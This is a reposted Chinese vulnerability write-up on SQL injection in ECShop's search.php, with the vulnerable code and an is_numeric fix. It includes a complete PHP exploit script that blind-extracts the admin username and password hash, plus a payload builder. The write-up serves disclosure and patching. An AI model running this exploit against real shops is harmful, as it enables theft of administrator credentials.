首页 / PHP / ecshop /search.php SQL Injection Vul

ecshop /search.php SQL Injection Vul

内容导读

互联网集市收集整理的这篇技术教程文章主要介绍了ecshop /search.php SQL Injection Vul，小编现在分享给大家，供广大互联网技能从业者学习和参考。文章包含4406字，纯文字阅读大概需要7分钟。

内容图文

. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考

1. 漏洞描述

ECSHOP商城系统Search.php页面过滤不严导致SQL注入漏洞

Relevant Link:

http://sebug.net/vuldb/ssvid-62317

2. 漏洞触发条件

0x1: POC

<?php
    ini_set("max_execution_time",0);
    error_reporting(7);
     
    function usage()
    {
        global $argv;
        exit(
        "\n--+++============================================================+++--".
        "\n--+++====== ECShop Search.php SQL Injection Exploit========+++--".
        "\n--+++============================================================+++--".
        "\n\n[+] Author: jannock".
        "\n[+] Team: [url]http://wavdb.com/[/url]".
        "\n[+] Usage: php ".$argv[0]." <hostname> <path> <goods_id>".
        "\n[+] Ex.: php ".$argv[0]." localhost / 1".
        "\n\n");
    }
     
    function query($pos, $chr, $chs,$goodid)
    {
        switch ($chs)
        {
            case 0:
                $query = "1=1";
                break;
            case 1:
                $query = " ascii(substring((select user_name from ecs_admin_user limit
                0,1),{$pos},1))={$chr}";
                break;
            case 2:
                $query = " ascii(substring((select password from ecs_admin_user limit
                0,1),{$pos},1))={$chr}";
                break;
            case 3:
                $query = " length((select user_name from ecs_admin_user limit 0,1))={$pos}";
                break;
        }
        $list=array("1‘ or 1=1) and 1=2 GROUP BY goods_id HAVING num = ‘1‘ union select $goodid,1 from ecs_admin_user where 1=1 and ". $query ."/*"=>"1");
        $query = array("attr"=>$list);
        $query = str_replace(‘+‘, ‘%2b‘, base64_encode(serialize($query)));
        return $query;
    }
     
    function exploit($hostname, $path, $pos, $chr, $chs,$goodid)
    {
        $chr = ord($chr);
        $conn = fsockopen($hostname, 80);
         
        $message = "GET ".$path."/search.php?encode=".query($pos, $chr, $chs,$goodid)." HTTP/1.1\r\n";
        $message .= "Host: $hostname\r\n";
        $message .= "Connection: Close\r\n\r\n";
         
        fwrite($conn, $message);
        while (!feof($conn))
        {
            $reply .= fgets($conn, 1024);
        }
        fclose($conn);
        return $reply;
    }
     
     
    function crkusername($hostname, $path, $chs,$goodid)
    {
        global $length;
        $key = "abcdefghijklmnopqrstuvwxyz0123456789";
        $chr = 0;
        $pos = 1;
        echo "[+] username: ";
        while ($pos <= $length)
        {
            $response = exploit($hostname, $path, $pos, $key[$chr], $chs,$goodid); 
            if (preg_match ("/javascript:addToCart/i", $response))
            {
                echo $key[$chr];
                $chr = 0;
                $pos++;
            }
            else
                $chr++;
        }
        echo "\n";
    }
     
    function crkpassword($hostname, $path, $chs,$goodid)
    {
        $key = "abcdef0123456789";
        $chr = 0;
        $pos = 1;
        echo "[+] password: ";
        while ($pos <= 32)
        {
            $response = exploit($hostname, $path, $pos, $key[$chr], $chs,$goodid);
            if (preg_match ("/javascript:addToCart/i", $response))
            {
                echo $key[$chr];
                $chr = 0;
                $pos++;
            }
            else
                $chr++;
        }
        echo "\n\n";
    }
     
    function lengthcolumns($hostname, $path,$chs, $goodid)
    {
        echo "[+] username length: ";
        $exit = 0;
        $length = 0;
        $pos = 1;
        $chr = 0;
        while ($exit==0)
        {
            $response = exploit($hostname, $path, $pos, $chr, $chs,$goodid);
            if (preg_match ("/javascript:addToCart/i", $response))
            {
                $exit = 1;
                $length = $pos;
                break;
            }
            else
            {
                $pos++;
                if($pos>20)
                {
                    exit("Exploit failed");
                }
            }
        }
        echo $length."\n";
        return $length;
    }
     
     
    if ($argc != 4)
        usage();
    $hostname = $argv[1];
    $path = $argv[2];
    $goodid = $argv[3];
    $length = lengthcolumns($hostname, $path, 3, $goodid);
    crkusername($hostname, $path, 1,$goodid);
    crkpassword($hostname, $path, 2,$goodid);
 
?>

可自行构造encode的值进行注入

<?php
    $list=array("1‘ or 1=1) and 1=2 GROUP BY goods_id HAVING num = ‘1‘ /*"=>"yy");
    $string = array("attr"=>$list);
    $string = str_replace(‘+‘, ‘%2b‘, base64_encode(serialize($string)));
    die($string);
?>

Relevant Link:

http://sebug.net/vuldb/ssvid-68687

3. 漏洞影响范围
4. 漏洞代码分析

/search.php

..
$string = base64_decode(trim($_GET[‘encode‘]));   //37行
..
//addslashes_deep 只能参数值进行过滤
$_REQUEST = array_merge($_REQUEST, addslashes_deep($string));   //69行
..
if (!empty($_REQUEST[‘attr‘]))
{
    $sql = "SELECT goods_id, COUNT(*) AS num FROM " . $ecs->table("goods_attr") . " WHERE 0 ";
    foreach ($_REQUEST[‘attr‘] AS $key => $val)
    {
        if (is_not_null($val))
        {
            $attr_num++;
            $sql .= " OR (1 ";

            if (is_array($val))
            {
                //$key是$_REQUEST[‘attr‘] 的键值，就是这里没有过滤，直接进入SQL查询，造成SQL注入漏洞
                $sql .= " AND attr_id = ‘$key‘";

Relevant Link:

http://sebug.net/vuldb/ssvid-19640

5. 防御方法

/search.php

if (!empty($_REQUEST[‘attr‘]))
{
    $sql = "SELECT goods_id, COUNT(*) AS num FROM " . $ecs->table("goods_attr") . " WHERE 0 ";
    foreach ($_REQUEST[‘attr‘] AS $key => $val)
    {
        /* 对key值进行注入判断 is_numeric($key)*/
        if (is_not_null($val) && is_numeric($key))
        {

6. 攻防思考

ecshop /search.php SQL Injection Vul

标签：

本文系统来源：http://www.cnblogs.com/LittleHann/p/4524063.html

内容总结

以上是互联网集市为您收集整理的ecshop /search.php SQL Injection Vul全部内容，希望文章能够帮你解决ecshop /search.php SQL Injection Vul所遇到的程序开发问题。如果觉得互联网集市技术教程内容还不错，欢迎将互联网集市网站推荐给程序员好友。

内容备注

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容，请发送邮件至 gblab@vip.qq.com 举报，一经查实，本站将立刻删除。

内容手机端

扫描二维码推送至手机访问。

本文链接：https://qyyshop.com/info/447644.html

来源：【匿名】

【上一篇】ecshop /category.php SQL Injection Vul 【下一篇】PHP 5 数据对象 (PDO) 抽象层与 Oracle

更多 ►

【ecshop /search.php SQL Injection Vul】教程文章相关的互联网学习教程文章

如何查看已经编译安装好的nginx、apache、php、mysql的编译参数？

一)、查看nginx的编译参数与版？[root@ryan~]#/application/nginx/sbin/nginx -Vnginx version: nginx/1.8.0built by gcc 4.4.720120313 (Red Hat 4.4.7-4) (GCC) built with OpenSSL1.0.1e-fips 11 Feb 2013TLS SNI support enabledconfigure arguments: --prefix=/application/nginx1.8.0 --user=nginx --group=nginx--with-http_stub_status_module --with-http_ssl_module 二)、查看apache的编译参数与版？ [root@ryan~]# cat/...

PHP编译安装mysql.so的扩展【代码】

1、进入php源码包安装路径pdo_mysql目录里面/usr/local/src/php/package/php-5.6.29/ext/pdo_mysql 2、运行phpize，在该目录下生成一个configure文件/usr/local/php/bin/phpize3、运行config，指定mysql和php目录位置./configure --prefix=/data/php --with-pdo-mysql=/data/mysql/bin/mysql_config --with-php-config=/data/php/bin/php-config --with-zlib-dir=/root/php-5.6.25/ext/zlib4、编译安装，生成mysql.somake && make...

Ubuntu16.04 下安装PHP+apache2+mysql以及MySQL扩展

注：本人是在腾讯云服务器上安装了Ubuntu16.04系统，在腾讯云中安装测试使用的。1、安装前建议先进入到Root状态下2、这个时候更新系统apt update3、安装Apache2apt install apache24、安装MySQLapt install mysql-server php7.0-mysqlapt-get install mysql-clientmysql_secure_installation5、在mysql扩展下载下载最新版本到本地，上传至腾讯云你具有权限的文件夹下解压6、安装phpize命令apt install php7.0-dev 注：这个时候在你...

超级简单的php+mysql留言本源码

共3个文件 IncDB.php数据库连接 index.php首页 InsetToDB.php数据库操作数据库lguestbook里面建表复制代码代码如下:CREATE TABLE `intd` ( `id` int(11) NOT NULL auto_increment, `name` varchar(255) character set utf8 collate utf8_bin NOT NULL, `text` text character set utf8 collate utf8_bin NOT NULL, `datetime` datetime NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=gb2312 AUTO_INCREMENT=11...

ThinkPHP学习（三）配置PHP5支持MySQL，连接MySQL数据库【图】

配置PHP5支持MySQL打开PHP配置文件“F:\PHP\php5328Win32\php.ini”，查找“extension=php_mysql.dll”，把前面的分号去掉，保存文件，启动服务；却提示“PHP startup: Unable to load dynamic library :F:\PHP\php_mysql.dll”错误，解决办法，打开PHP配置文件“F:\PHP\php5328Win32\php.ini”，查找“extension_dir = "ext"”，把前面的分号去掉，保存文件，启动服务，问题解决；准备测试数据如果你还没有安装MySQL，请先安装MyS...

php+mysql+Apache环境搭建【图】

最近有一个小程序需要用php来跑，记录一下php的环境配置过程。1.首先在下载集成工具wamp，WAMP是指在Windows服务器上使用Apache、MySQL和PHP的集成安装环境，可以快速安装配置Web服务器：https://sourceforge.net/projects/wampserver/files/WampServer%203/WampServer%203.0.0/wampserver3.0.6_x64_apache2.4.23_mysql5.7.14_php5.6.25-7.0.10.exe/download下载后直接安装即可。2.安装完成后运行wamp，在桌面右下角即会出现wamp的...

php+mysql实现数据库随机重排实例

本文实例实现了php+mysql数据库随机重排的方法，可将表中的所有数据随机读出来一次之后再进行随机保存到另一个表，从而达到了记录随机的功能。主要实现代码如下：复制代码代码如下:<?php //数据库连接就不写在这里面了 $s = isset( $_GET[‘s‘] )?$_GET[‘s‘]:0; $e = isset( $_GET[‘e‘])?$_GET[‘e‘]:50; $count =85000; if( $s < $count ) { $sql = "select * from 表前缀_info where isget =0 order by id desc limit $s...

PHP中使用localhost连接Mysql不成功的解决方法

发现问题昨天在帮同事编译安装Linux环境时，遇到一个问题： WEB服务器是apache，数据库是MySQL。于是写了一个测试连接数据库的PHP页面：复制代码代码如下:$mysql = mysql_connect(‘localhost‘,‘root‘,‘‘);打开 http://localhost/test.php 测试提示：Can‘t connect to local MySQL server through socket...检查环境正常以为是数据库没有启动，于是查看一下进程，MySQL在进程里，重启了一下MySQL.使用mysql -u root -p 可以...

php5.3中连接sqlserver2000的两种方法(com与ODBC)

1.Com链接，ADODB.Connection 复制代码代码如下:$conn = new Com("ADODB.Connection"); //实例化一个Connection对象 $connstr = "provider=sqloledb;datasource=.;uid=sa;pwd=123456;database=jnold;"; $conn->Open($connstr); $rs = new Com("ADODB.Recordset"); //实例化一个Recordcount对象 $rs->Open(‘select * from News where bigclassid = 59 And LeadPostil is null‘, $conn, 1, 1); $count = $rs->RecordCount; echo "...

Linux部署Nginx+Mysql+PHP+PHPMyAdmin4环境【代码】【图】

开场白：不知道自己这是第几次部署这样的测试环境了（N>50），曾经年少时，一天时间在家反复重装 Windows98 九遍！至于原因是系统安装完再安装其它第三方软件老是容易出现各种蓝屏，我又有系统洁癖，不完美就喜欢推到重来，关键一定要纯净！(那时的Windows 是16位与32位混合的形态）好吧，一下子暴露了年龄。因为这种洁癖，那时的我可以把Windows、Offfice的序列号完全的背出来，安装系统的速度无人能及~，哈哈。其实最大的好处是...

windows7配置Nginx+php+mysql教程【代码】【图】

windows7配置Nginx+php+mysql教程最近在学习php，想把自己的学习经历记录下来，并写一些经验，仅供参考交流。此文适合那些刚刚接触php，想要学习并想要自己搭建Nginx+php+mysql环境的同学。当然，你也可以选择集成好的安装包，比如 wamp等，不过我推荐大家还是自己手动搭建一下环境比较好，这样能够更好的了解php及其运行流程。下面直接进入正题。步骤：1.准备安装包等　　（1）nginx-1.10.1.zip，下载链接为http://nginx.org/...

linux卸载mysql，apache，php

卸载Mysql1、查找以前是否装有mysql命令：rpm -qa|grep -i mysql可以看到mysql的包：mysql-3.23.58-9php-mysql-4.3.4-11mod_auth_mysql-20030510-4.1mysql-server-3.23.58-92、删除mysql删除命令：rpm -e --nodeps 包名rpm -ev mysql-server-3.23.58-9说明：rpm –qa | grep mysql 命令是为了把mysql相关的包都列出来，卸载都从最下面的一个包开始，直到卸载掉第一个为止。执行rpm -q php，如果返回php版本，则是rpm安装；不返回ph...

PHP Client for Mysql Binlog【代码】

PHP解析Mysql Binlog，依赖于mysql-replication-listener库详见：https://github.com/bullsoft/php-binlogInstall MySQL Replication Listenerhttps://github.com/bullsoft/mysql-replication-listener/archive/master.zipunzip mysql-replication-listener-master.zip cd mysql-replication-listener-master cmake .-DCMAKE_INSTALL_PREFIX=/usr/local/mysql-replication make & make installInstall php-binloghttps://github....

当PHP遇到MySQL存储过程

1、MySQL存储过程我们常用的操作数据库语言SQL语句在执行的时候需要要先编译，然后执行，而存储过程（Stored Procedure）是一组为了完成特定功能的SQL语句集，经编译后存储在数据库中，用户通过指定存储过程的名字并给定参数（如果该存储过程带有参数）来调用执行它。一个存储过程是一个可编程的函数，它在数据库中创建并保存。它可以有SQL语句和一些特殊的控制结构组成。当希望在不同的应用程序或平台上执行相同的函数，或者封装...

centos7搭建apache、mysql、php【图】

转自：https://www.cnblogs.com/apro-abra/p/4862285.html 1.安装yum -y install httpd 2.开启apache服务systemctl start httpd.service 3.设置apache服务开机启动systemctl enable httpd.service4.验证apache服务是否安装成功在本机浏览器中输入虚拟机的ip地址，CentOS7查看ip地址的方式为：ip addr （阿里云不需要用这种方式查看，外网ip已经在你主机列表那里给你写出来了的；）这里是访问不成功的（阿里云用外网访问，能成功...

首页 / PHP / ecshop /search.php SQL Injection Vul

ecshop /search.php SQL Injection Vul

内容导读

内容图文

内容总结

内容备注

内容手机端

【ecshop /search.php SQL Injection Vul】教程文章相关的互联网学习教程文章

如何查看已经编译安装好的nginx、apache、php、mysql的编译参数？

PHP编译安装mysql.so的扩展【代码】

Ubuntu16.04 下安装PHP+apache2+mysql以及MySQL扩展

超级简单的php+mysql留言本源码

ThinkPHP学习（三）配置PHP5支持MySQL，连接MySQL数据库【图】

php+mysql+Apache环境搭建【图】

php+mysql实现数据库随机重排实例

PHP中使用localhost连接Mysql不成功的解决方法

php5.3中连接sqlserver2000的两种方法(com与ODBC)

Linux部署Nginx+Mysql+PHP+PHPMyAdmin4环境【代码】【图】

windows7配置Nginx+php+mysql教程【代码】【图】

linux卸载mysql，apache，php

PHP Client for Mysql Binlog【代码】

当PHP遇到MySQL存储过程

centos7搭建apache、mysql、php【图】

SEARCH - 相关标签

PHP - 相关标签

SQL - 相关标签

PHP - 技术教程分类

PHP - 最新教程

PHP - 最热教程